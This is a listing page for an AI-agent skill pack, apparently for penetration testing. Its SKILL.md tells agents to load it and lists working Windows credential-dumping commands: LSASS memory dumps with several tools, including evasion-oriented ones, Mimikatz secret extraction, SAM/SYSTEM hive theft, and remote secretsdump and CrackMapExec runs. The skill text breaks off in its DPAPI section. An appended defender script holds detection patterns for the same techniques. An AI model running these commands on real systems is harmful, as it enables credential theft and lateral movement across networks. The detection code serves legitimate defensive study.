
Windows Lateral Movement
Load reference procedures for authorized Windows credential extraction and lateral-movement testing when you run professional penetration tests or defensive purple-team labs—not for everyday app shipp
Install
npx skills add https://github.com/yaklang/hack-skills --skill windows-lateral-movement
What is this skill?
- Compares seven LSASS dump approaches (comsvcs MiniDump, ProcDump, Mimikatz, nanodump, handlekatz, PPLdump, remote lsassy)
- Documents comsvcs.dll and PowerShell rundll32 MiniDump invocations with admin and SeDebugPrivilege requirements
- Covers ProcDump Sysinternals usage with -ma against lsass.exe
- Positions LSASS/SAM/DPAPI/NTDS topics as an adjunct to the main lateral-movement SKILL.md
- Includes AV detection risk notes per method in a comparison table
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).
Journey fit
Offensive Windows techniques belong on the Ship shelf under security validation for environments where you are explicitly testing exposure before or after release. Credential dumping and lateral movement are core security-assessment subtasks distinct from routine unit tests or CI linting.
Common Questions / FAQ
Is Windows Lateral Movement safe to install?
skills.sh reports 0 of 3 security scanners passed. Review the Security Audits panel on this page before installing in production.
SKILL.md - Windows Lateral Movement
# Credential Dumping Techniques

> **AI LOAD INSTRUCTION**: Load this for LSASS dump methods, SAM/SYSTEM extraction, DPAPI secrets, cached domain credentials, and NTDS.dit extraction. Assumes the main [SKILL.md](./SKILL.md) is already loaded for lateral movement techniques.

---

## 1. LSASS MEMORY DUMP TECHNIQUES

### Method Comparison

| Method | Tool | AV Detection Risk | Requires | Notes |
|---|---|---|---|---|
| MiniDump (comsvcs.dll) | Built-in Windows DLL | Medium | Admin + SeDebugPrivilege | Commonly monitored |
| ProcDump | Sysinternals (signed) | Medium-High | Admin | Microsoft-signed, but well-known |
| Mimikatz | Custom | High | Admin + SeDebugPrivilege | Most capable, most detected |
| nanodump | Custom | Low | Admin + SeDebugPrivilege | Uses MiniDumpWriteDump variants |
| handlekatz | Custom | Low | Admin | Clone LSASS handle, then dump |
| PPLdump | Custom | Low | Admin | Bypass PPL (Protected Process Light) |
| lsassy | Remote (Impacket) | Medium | Admin SMB access | Remote dump + parse, no disk touch |

### comsvcs.dll MiniDump

```cmd
# Find LSASS PID
tasklist /fi "imagename eq lsass.exe"

# Dump using comsvcs.dll (built-in Windows DLL)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump PID C:\temp\lsass.dmp full
```

```powershell
# PowerShell variant
$lsass = Get-Process lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass.Id C:\temp\lsass.dmp full
```

### ProcDump (Sysinternals)

```cmd
procdump -ma lsass.exe lsass.dmp -accepteula
```

### Mimikatz (Direct Memory Read)

```cmd
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest & REM WDigest plaintext (if enabled)
mimikatz # sekurlsa::kerberos & REM Kerberos tickets
mimikatz # sekurlsa::msv & REM NTLM hashes
```

### nanodump (EDR Evasion)

```cmd
# Direct syscalls, unhooks NTDLL, avoids API hooks
nanodump.exe --write C:\temp\lsass.dmp
nanodump.exe --fork --write C:\temp\lsass.dmp & REM Fork process first (stealthier)
```

### handlekatz

```cmd
# Clone LSASS handle from another process (avoids direct LSASS open)
handlekatz.exe --pid LSASS_PID --outfile C:\temp\lsass.dmp
```

### Remote Dump with lsassy

```bash
# From Linux — dump and parse remotely
lsassy -u administrator -p password TARGET_IP
lsassy -u administrator -H NTLM_HASH TARGET_IP

# Specific dump method
lsassy -u administrator -p password TARGET_IP -m comsvcs
lsassy -u administrator -p password TARGET_IP -m nanodump
```

### Parse Dump Offline

```bash
# Mimikatz offline parsing
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

# pypykatz (Python, cross-platform)
pypykatz lsa minidump lsass.dmp
```

---

## 2. SAM / SYSTEM / SECURITY HIVE EXTRACTION

### Local Extraction

```cmd
# reg save (requires admin)
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY

# Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
```

### Remote Extraction

```bash
# Impacket secretsdump (remote, in-memory)
secretsdump.py DOMAIN/administrator:password@TARGET_IP

# With hash
secretsdump.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

# CrackMapExec
crackmapexec smb TARGET_IP -u administrator -p password --sam
crackmapexec smb TARGET_IP -u administrator -p password --lsa
```

### Offline Parsing

```bash
# Impacket secretsdump offline
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
# Extract local account hashes + cached domain creds + LSA secrets
```

---

## 3. DPAPI SECRETS

DPAPI protects browser passwords, Wi-Fi keys, credential manager entries, and more.

### Credential Manager

```cmd
# List stored credentials
cmdkey /list

# Mimikatz — dump DPAPI credentials
mimikatz # vault::cred
mimikatz # vault::list

# Decrypt DPAPI blob
```
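As an added defender-side example (not part of the skill or the original page), the following Python classifies Sysmon-style process-creation and process-access events against the comsvcs MiniDump, ProcDump, Mimikatz, reg save and shadow-copy methods listed above. The sample events, the field names and the allowlist are constructed assumptions modelled on Sysmon's EventID 1 and 10 schemas.

```python
import re

# Constructed Sysmon-style events (not from the original page). EventID 1 is
# ProcessCreate, EventID 10 is ProcessAccess; field names mirror Sysmon's.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\temp\lsass.dmp full"},
    {"EventID": 1, "Image": r"C:\tools\procdump.exe",
     "CommandLine": "procdump -ma lsass.exe lsass.dmp -accepteula"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SAM C:\temp\SAM"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Desktop\x.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
]

PROCESS_VM_READ = 0x0010  # access right every LSASS memory dump needs

# Command-line patterns for the techniques in the comparison table above.
COMMAND_LINE_RULES = {
    "comsvcs MiniDump": re.compile(r"comsvcs\.dll.*\bminidump\b", re.I),
    "ProcDump on LSASS": re.compile(r"procdump.*\s-ma\s+lsass", re.I),
    "Mimikatz sekurlsa": re.compile(r"sekurlsa::", re.I),
    "Hive export via reg save": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I),
    "Shadow copy creation": re.compile(r"vssadmin.*create\s+shadow", re.I),
}

# Constructed allowlist of processes that legitimately read LSASS; tune per
# environment (AV/EDR agents, backup software).
LSASS_ACCESS_ALLOWLIST = {r"c:\windows\system32\svchost.exe", r"c:\windows\system32\csrss.exe"}


def classify(event):
    """Return the technique names an event matches (empty list if benign)."""
    hits = []
    if event.get("EventID") == 1:
        cmd = event.get("CommandLine", "")
        hits += [name for name, rx in COMMAND_LINE_RULES.items() if rx.search(cmd)]
    elif event.get("EventID") == 10:
        target = event.get("TargetImage", "").lower()
        source = event.get("SourceImage", "").lower()
        granted = int(event.get("GrantedAccess", "0x0"), 16)
        # Flag any non-allowlisted process that opens LSASS with VM_READ,
        # whatever the exact mask; dump tools need that bit.
        if target.endswith(r"\lsass.exe") and granted & PROCESS_VM_READ and source not in LSASS_ACCESS_ALLOWLIST:
            hits.append("LSASS handle with PROCESS_VM_READ")
    return hits


def scan(events):
    """Map the index of each flagged event to its technique hits."""
    results = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results[i] = hits
    return results
```

Scanning the constructed sample flags the comsvcs, ProcDump, reg save and untrusted LSASS-handle events and leaves the notepad and svchost events alone.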